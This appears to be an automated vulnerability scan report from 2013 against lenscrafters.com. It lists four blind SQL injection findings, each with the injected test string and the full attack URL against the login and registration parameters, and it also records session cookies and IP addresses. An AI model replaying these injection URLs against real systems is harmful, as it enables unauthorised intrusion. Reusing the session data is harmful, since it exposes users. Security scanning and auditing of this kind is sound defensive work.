Report for http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?storeId=10851&catalogId=11651&langId=-1&errorViewName=UserRegistrationAddAjaxView&URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId=11651%26myAcctMain=1%26langId=-1%26storeId=10851&challengeQuestion=-&challengeAnswer=-&logonId=1&logonIdVerify=1&logonPassword=skipfish&temp_logonPassword=skipfish&logonPasswordVerify=skipfish&temp_logonPasswordVerify=9%201%20-&optin_18yrs=on&receiveEmail=on (Generated on 2013-09-23 02:27:03 +1130)

Found a false positive? Report it here.

Summary


(Submit empty query to show all again.)

 

 

 

 

 

Configuration

Version: 1.0dev
Revision: 0.2.8
Audit started on: Mon Sep 23 01:48:28 2013
Audit finished on: Mon Sep 23 02:26:00 2013
Runtime: 00:37:33

 

Runtime options

URL: http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?storeId=10851&catalogId=11651&langId=-1&errorViewName=UserRegistrationAddAjaxView&URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId=11651%26myAcctMain=1%26langId=-1%26storeId=10851&challengeQuestion=-&challengeAnswer=-&logonId=1&logonIdVerify=1&logonPassword=skipfish&temp_logonPassword=skipfish&logonPasswordVerify=skipfish&temp_logonPasswordVerify=9%201%20-&optin_18yrs=on&receiveEmail=on
User agent: Mozilla/5.0

 

Audited elements Modules Filters Cookies
  • Links
  • Forms
  • Cookies
  • Headers
  • sqli
  • sqli_blind_rdiff
  • sqli_blind_timing
  • Exclude:
    • N/A
  • Include:
    • N/A
  • Redundant:
    • N/A
  • JSESSIONID = 0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu
  • WC_PERSISTENT = ARJHSX25nJdo1YMOflsClomVzVs= ;2013-09-22 03:41:23.758_1379839283758-280914_0
  • metroCode = 0
  • lc_zipcode =
  • lc_state =
  • lc_city =
  • lc_country = Germany
  • lc_latitude = 51.0
  • lc_longitude = 9.0
  • ipaddress = 87.118.91.140, 23.65.181.156, 46.33.71.253

Issues

(Submit empty query to show all again.)

Trusted issues

At the time these issues were logged there were no abnormal interferences or anomalous server behavior.
These issues are considered trusted and fairly accurate.

[1] Blind SQL Injection (differential analysis)

Description

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

Remedial guidance

Suppression of error messages leads to security through obscurity which is not a good practise. The web application needs to enforce stronger validation on user inputs.

[+] Variation 1
Affected URL:

http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1'+and+'+1=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-



Injected value:
 "1' and ' 1=1" 

Regular expression:

                        

Headers
Request Response
Accepttext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encodinggzip, deflate
User-AgentMozilla/5.0
CookieJSESSIONID=0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu;WC_PERSISTENT=ARJHSX25nJdo1YMOflsClomVzVs%3D%0A%3B2013-09-22+03:41:23.758_1379839283758-280914_0;metroCode=0;lc_zipcode=;lc_state=;lc_city=;lc_country=Germany;lc_latitude=51.0;lc_longitude=9.0;ipaddress=87.118.91.140,+23.65.181.156,+46.33.71.253
ServerIBM_HTTP_Server
VaryAccept-Encoding
Content-Encodinggzip
X-Ua-CompatibleIE=edge
P3pCP='We do not have a P3P Policy see http://www.lenscrafters.com/lc-us/privacy-policy'
Content-Length20
Content-Typetext/plain
Content-Languageen-US
ExpiresSun, 22 Sep 2013 08:44:05 GMT
Cache-Controlmax-age=0, no-cache, no-store
Pragmano-cache
DateSun, 22 Sep 2013 08:44:05 GMT
Connectionkeep-alive

 

[2] Blind SQL Injection (differential analysis)

Description

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

Remedial guidance

Suppression of error messages leads to security through obscurity which is not a good practise. The web application needs to enforce stronger validation on user inputs.

[+] Variation 1
Affected URL:

http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1'+and+'+1=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-



Injected value:
 "1' and ' 1=1" 

Regular expression:

                        

Headers
Request Response
Accepttext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encodinggzip, deflate
User-AgentMozilla/5.0
CookieJSESSIONID=0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu;WC_PERSISTENT=ARJHSX25nJdo1YMOflsClomVzVs%3D%0A%3B2013-09-22+03:41:23.758_1379839283758-280914_0;metroCode=0;lc_zipcode=;lc_state=;lc_city=;lc_country=Germany;lc_latitude=51.0;lc_longitude=9.0;ipaddress=87.118.91.140,+23.65.181.156,+46.33.71.253
ServerIBM_HTTP_Server
VaryAccept-Encoding
Content-Encodinggzip
X-Ua-CompatibleIE=edge
P3pCP='We do not have a P3P Policy see http://www.lenscrafters.com/lc-us/privacy-policy'
Content-Length20
Content-Typetext/plain
Content-Languageen-US
ExpiresSun, 22 Sep 2013 08:44:05 GMT
Cache-Controlmax-age=0, no-cache, no-store
Pragmano-cache
DateSun, 22 Sep 2013 08:44:05 GMT
Connectionkeep-alive

 

[3] Blind SQL Injection (differential analysis)

Description

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

Remedial guidance

Suppression of error messages leads to security through obscurity which is not a good practise. The web application needs to enforce stronger validation on user inputs.

[+] Variation 1
Affected URL:

http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on'+and+'+1=1&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-



Injected value:
 "on' and ' 1=1" 

Regular expression:

                        

Headers
Request Response
Accepttext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encodinggzip, deflate
User-AgentMozilla/5.0
CookieJSESSIONID=0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu;WC_PERSISTENT=ARJHSX25nJdo1YMOflsClomVzVs%3D%0A%3B2013-09-22+03:41:23.758_1379839283758-280914_0;metroCode=0;lc_zipcode=;lc_state=;lc_city=;lc_country=Germany;lc_latitude=51.0;lc_longitude=9.0;ipaddress=87.118.91.140,+23.65.181.156,+46.33.71.253
ServerIBM_HTTP_Server
Cached-Responsetrue
VaryAccept-Encoding
Content-Encodinggzip
X-Ua-CompatibleIE=edge
P3pCP='We do not have a P3P Policy see http://www.lenscrafters.com/lc-us/privacy-policy'
Content-Typetext/html;charset=UTF-8
Content-Languageen-US
Content-Length1628
ExpiresSun, 22 Sep 2013 09:16:30 GMT
Cache-Controlmax-age=0, no-cache, no-store
Pragmano-cache
DateSun, 22 Sep 2013 09:16:30 GMT
Connectionkeep-alive
Set-CookiemetroCode=0; Path=/
Set-Cookielc_zipcode=""; Path=/
Set-Cookielc_state=02; Path=/
Set-Cookielc_city=N�rnberg; Path=/
Set-Cookielc_country=Germany; Path=/
Set-Cookielc_latitude=49.4478; Path=/
Set-Cookielc_longitude=11.068298; Path=/
Set-Cookieipaddress=85.10.211.53%2C+23.65.181.159; Path=/

 

[4] Blind SQL Injection (differential analysis)

Description

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

Remedial guidance

Suppression of error messages leads to security through obscurity which is not a good practise. The web application needs to enforce stronger validation on user inputs.

[+] Variation 1
Affected URL:

http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on'+and+'+1=1&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-



Injected value:
 "on' and ' 1=1" 

Regular expression:

                        

Headers
Request Response
Accepttext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encodinggzip, deflate
User-AgentMozilla/5.0
CookieJSESSIONID=0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu;WC_PERSISTENT=ARJHSX25nJdo1YMOflsClomVzVs%3D%0A%3B2013-09-22+03:41:23.758_1379839283758-280914_0;metroCode=0;lc_zipcode=;lc_state=;lc_city=;lc_country=Germany;lc_latitude=51.0;lc_longitude=9.0;ipaddress=87.118.91.140,+23.65.181.156,+46.33.71.253
ServerIBM_HTTP_Server
VaryAccept-Encoding
Content-Encodinggzip
X-Ua-CompatibleIE=edge
P3pCP='We do not have a P3P Policy see http://www.lenscrafters.com/lc-us/privacy-policy'
Content-Length20
Content-Typetext/plain
Content-Languageen-US
ExpiresSun, 22 Sep 2013 08:44:05 GMT
Cache-Controlmax-age=0, no-cache, no-store
Pragmano-cache
DateSun, 22 Sep 2013 08:44:05 GMT
Connectionkeep-alive

 

Untrusted

These issues are considered untrusted (and may in fact be false positives) because at the time they were identified the server was exhibiting some kind of anomalous behavior or there was third part interference (like network latency for example).
The listed issues need verification by a human.

No untrusted issues have been logged.

Plugin results

Resolves vulnerable hostnames to IP addresses.

Results

Hostname IP Address
www.lenscrafters.com 23.66.236.125

Generates a simple list of safe/unsafe URLs.

http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView
http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1'+and+'+1=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-
http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1'+and+'+1=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-
http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on'+and+'+1=1&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-
http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on'+and+'+1=1&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-

Stats

Total: 5
Safe: 1
Unsafe: 4
Issue percentage: 80%

Sitemap